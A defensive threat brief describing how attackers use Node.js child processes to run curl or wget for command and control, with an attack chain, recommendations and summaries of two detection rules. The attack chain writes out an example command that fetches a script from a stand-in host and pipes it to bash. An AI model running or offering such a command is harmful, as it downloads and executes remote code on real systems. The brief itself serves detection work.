Node.js Spawning Curl or Wget for Command and Control
Detection of Node.js directly or via a shell spawning curl or wget, potentially indicating command and control behavior where adversaries download tools or payloads onto the system.
This threat brief focuses on the detection of malicious activity where Node.js, a widely used JavaScript runtime environment, is leveraged to execute command-line tools like curl and wget. This activity can occur either directly or indirectly through a shell. Attackers may exploit Node.js applications to download and execute malicious payloads, effectively using the compromised application as a conduit for command and control (C2) operations. This behavior is particularly concerning because it can be masked under the guise of legitimate application activity, making it harder to detect. Defenders should be aware of Node.js processes spawning child processes, specifically curl or wget, and investigate further.
Attack Chain
- An attacker gains initial access to a system either via exploiting a vulnerable Node.js application or compromising a server running Node.js.
- The attacker leverages the
child_processmodule in Node.js to execute system commands. - The attacker uses
child_process.exec,child_process.spawn, orchild_process.execFileto call a shell. - Within the shell, the attacker executes
curlorwgetto download a malicious payload from a remote server. The attacker may use flags such as-sLor--insecureto bypass security measures. - The downloaded payload is saved to a temporary directory like
/tmp,/var/tmp, or/dev/shm. - The attacker may then execute the downloaded payload using a shell interpreter (e.g.,
bash,sh) by piping the output ofcurlorwgetdirectly into the interpreter (e.g.,curl http://evil.com/payload.sh | bash). - The executed payload establishes a reverse shell or performs other malicious activities, such as data exfiltration or lateral movement.
- The attacker maintains persistence by creating cron jobs or systemd services that execute the malicious payload periodically.
Impact
Successful exploitation can lead to complete system compromise, data theft, and the establishment of a persistent foothold within the network. This can result in significant financial losses, reputational damage, and disruption of critical business operations. The use of Node.js makes detection difficult because it blends malicious activity with legitimate application behavior. The impact scales with the permissions of the account running the Node.js process.
Recommendation
- Implement the provided Sigma rule to detect when Node.js spawns
curlorwgetprocesses and tune it for your environment. - Monitor process creation events and network connections originating from Node.js processes to identify suspicious behavior.
- Enforce strict egress filtering to prevent Node.js applications from communicating with unauthorized external endpoints.
- Regularly audit Node.js application dependencies for known vulnerabilities and ensure timely patching.
- Use application sandboxing and privilege separation to limit the impact of potential compromises.
- Implement integrity monitoring to detect unauthorized modifications to files and configurations.
Detection coverage 2
Node.js Spawning Shell with Curl/Wget Command
mediumDetects when Node.js spawns a shell (e.g., bash, cmd.exe) and executes curl or wget commands, potentially indicating command and control activity.
Node.js Directly Spawning Curl/Wget
mediumDetects when Node.js directly spawns curl or wget processes, potentially indicating command and control activity.
Detection queries are available on the platform. Get full rules →